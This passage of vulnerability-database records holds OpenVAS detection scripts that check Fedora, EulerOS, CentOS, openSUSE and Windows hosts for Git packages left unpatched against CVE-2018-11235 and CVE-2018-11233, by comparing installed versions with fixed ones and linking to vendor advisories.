or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874773\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 06:04:31 +0200 (Fri, 06 Jul 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-b10e54263a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b10e54263a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AN3BUPV64POHW6JZCR2ILD4YRIHHKEEQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.4~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:40:17", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181215", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181215", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1215\");\n script_version(\"2020-01-23T11:17:49+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:17:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1215)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1215\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1215\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1215 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:27", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1216)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181216", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181216", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1216\");\n script_version(\"2020-01-23T11:17:50+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:17:50 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:50 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1216)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1216\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1216\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1216 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "Check the version of emacs-git", "cvss3": {}, "published": "2018-06-23T00:00:00", "type": "openvas", "title": "CentOS Update for emacs-git CESA-2018:1957 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882913", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882913", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1957_emacs-git_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for emacs-git CESA-2018:1957 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882913\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-23 05:57:21 +0200 (Sat, 23 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for emacs-git CESA-2018:1957 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of emacs-git\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Git is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git repository\nis an exact copy with complete revision history. 
This not only allows the\nuser to work on and contribute to projects without the need to have\npermission to push the changes to their official repositories, but also\nmakes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n * git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\");\n script_tag(name:\"affected\", value:\"emacs-git on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1957\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-June/022924.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"emacs-git\", rpm:\"emacs-git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"emacs-git-el\", rpm:\"emacs-git-el~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-all\", rpm:\"git-all~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-bzr\", rpm:\"git-bzr~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-hg\", rpm:\"git-hg~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gitweb\", rpm:\"gitweb~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Git-SVN\", rpm:\"perl-Git-SVN~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2019-10-09T14:49:35", "description": "Git is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-05-31T00:00:00", "type": "openvas", "title": "Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113205", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113205\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-31 14:37:56 +0200 (Thu, 31 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(\"Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_git_detect_win.nasl\");\n script_mandatory_keys(\"Git/Win/Ver\");\n\n script_tag(name:\"summary\", value:\"Git is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory\n\n - With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs\n 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended\n to $GIT_DIR/modules, leading to directory traversal with '../' in a name.\n Finally, post-checkout hooks from a submodule 
are executed, bypassing the intended design in which hooks\n are not obtained from a remote server (Remote Code Execution can occur)\");\n script_tag(name:\"affected\", value:\"Git versions through 2.13.6, 2.14.0 through 2.14.3, 2.15.0 through 2.15.1, 2.16.0 through 2.16.3 and 2.17.0.\");\n script_tag(name:\"solution\", value:\"Update to version 2.13.7, 2.14.4, 2.15.2, 2.16.4 or 2.17.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://marc.info/?l=git&m=152761328506724&w=2\");\n script_xref(name:\"URL\", value:\"https://securitytracker.com/id/1040991\");\n script_xref(name:\"URL\", value:\"https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:git_for_windows_project:git_for_windows\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"2.13.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.13.7\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.14.0\", test_version2: \"2.14.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.14.4\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.15.0\", test_version2: \"2.15.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.15.2\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.16.0\", test_version2: \"2.16.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.16.4\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_is_equal( version: 
version, test_version: \"2.17.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.17.1\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:43:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:1553-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851774", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851774", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851774\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 05:47:36 +0200 (Wed, 06 Jun 2018)\");\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:1553-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for fixes the following security issues:\n\n * path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233,\n boo#1095218)\n\n * arbitrary code execution when recursively cloning a malicious repository\n (CVE-2018-11235, boo#1095219)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-557=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-557=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n 
script_xref(name:\"openSUSE-SU\", value:\"2018:1553-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00004.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", 
rpm:\"git-daemon-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1385)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-1000117"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191385", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191385", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are 
